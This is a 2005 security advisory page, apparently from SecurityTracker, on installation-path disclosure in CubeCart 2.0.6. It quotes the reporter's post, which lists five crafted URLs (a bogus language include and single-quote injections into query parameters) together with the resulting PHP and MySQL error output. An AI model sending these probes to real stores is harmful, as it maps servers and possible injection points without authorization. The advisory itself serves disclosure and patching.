SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Commerce)  >   CubeCart (formerly eStore) Vendors:   brooky.com
CubeCart Discloses Installation Path to Remote Users
SecurityTracker Alert ID:  1013660
SecurityTracker URL:  http://securitytracker.com/id/1013660
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 7 2005
Impact:   Disclosure of system information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.0.6
Description:   Some vulnerabilties were reported in CubeCart. A remote user can determine the installation path.

A remote user can supply a specially crafted URL to cause the system to display an error message that discloses the installation path and other data.

Some demonstration exploit URLs are provided:

http://[target]/index.php?&language=f00bar.php

http://[target]/index.php?&PHPSESSID='

http://[target]/tellafriend.php?&product='

http://[target]/view_cart.php?add='

http://[target]/view_product.php?product='

The vendor was notified on March 5, 2005.

John Cobb reported this vulnerability.

Impact:   A remote user can determine the installation path.
Solution:   The vendor has issued a fixed version (2.0.7), available at:

http://www.cubecart.com/site/forums/index.php?act=Downloads

Vendor URL:  www.cubecart.com/site/home/ (Links to External Site)
Cause:   Access control error, Exception handling error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [infosec-discuss] [NOBYTES.COM: #6] CubeCart 2.0.6 - Information



Hello All,

I have discovered a number of remote vulnerabilities in: CubeCart 2.0.6.

Authors Site: http://www.cubecart.com

CubeCart is described by its authors as:

'What is CubeCart?

CubeCart is an eCommerce script written with PHP & MySQL. With CubeCart you
can setup a powerful online store as long as you have hosting supporting PHP
and one MySQL database.'

+-[Examples:]--------------------------------------------------+



[1]------------------------------------------------------------+

http://www.victimsite.com/index.php?&language=f00bar.php

Warning: Failed opening '/var/www/html/admin/lang/f00bar.php' for inclusion
(include_path='.:/usr/share/pear') in /var/www/html/admin/settings.inc.php
on line 147

[2]------------------------------------------------------------+

http://www.victimsite.com/index.php?&PHPSESSID='

Warning: Failed to write session data (files). Please verify that the
current setting of session.save_path is correct (/tmp) in Unknown on line 0

[3]------------------------------------------------------------+

http://www.victimsite.com/tellafriend.php?&product='

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/tellafriend.php on line 46

[4]------------------------------------------------------------+

http://www.victimsite.com/view_cart.php?add='

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_cart.php on line 49

[5]------------------------------------------------------------+

http://www.victimsite.com/view_product.php?product='

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_product.php on line 53

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_product.php on line 63

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_product.php on line 144

+-[Notes:]-----------------------------------------------------+

Vulnerabilities found on: 05/03/2005
Author(s) Informed on: 05/03/2005
Author(s) Response: 05/03/2005
Author(s) Fix: 05/04/2005

 

Regards

John Cobb

JohnC@NoBytes.com

http://www.NoBytes.com


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC